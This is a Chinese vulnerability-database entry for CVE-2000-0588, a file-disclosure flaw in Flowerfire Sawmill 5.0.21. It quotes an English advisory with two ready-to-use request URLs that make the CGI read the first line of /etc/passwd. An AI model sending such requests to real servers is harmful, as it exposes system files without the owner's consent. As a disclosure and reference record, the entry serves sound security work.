Flowerfire Sawmill文件访问漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105899 漏洞类型 信息泄露
发布时间 2000-06-26 更新时间 2005-05-02
CVE编号 CVE-2000-0588 CNNVD-ID CNNVD-200006-100
漏洞平台 CGI CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/20041
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200006-100
|漏洞详情
SawMill5.0.21版本CGI程序存在漏洞。远程攻击者通过列表rfcf参数文件可以读取任意文件的第一行,那些文件的内容SawMill试图解析配置命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/1402/info

Sawmill is a site statistics package for Unix, Windows and Mac OS. A specially crafted request can disclose the first line of any world readable file for which the full pathname is known, for example /etc/passwd. The output of the request is similar to the following: 'Unknown configuration command "root:x:0:0:root:/root:/bin/sh" in "/etc/passwd".' 

The following request will display the first line of /etc/passwd

http://target:port/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3

If sawmill is run as a cgi script, the following can be used instead:

http://target/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
|参考资料

来源:BUGTRAQ
名称:20000626sawmill5.0.21oldpathbug&weakhashalgorithm
链接:http://archives.neohapsis.com/archives/bugtraq/2000-06/0271.html
来源:BID
名称:1402
链接:http://www.securityfocus.com/bid/1402
来源:BUGTRAQ
名称:20000706PatchforFlowerfireSawmillVulnerabilitiesAvailable
链接:http://archives.neohapsis.com/archives/bugtraq/2000-07/0080.html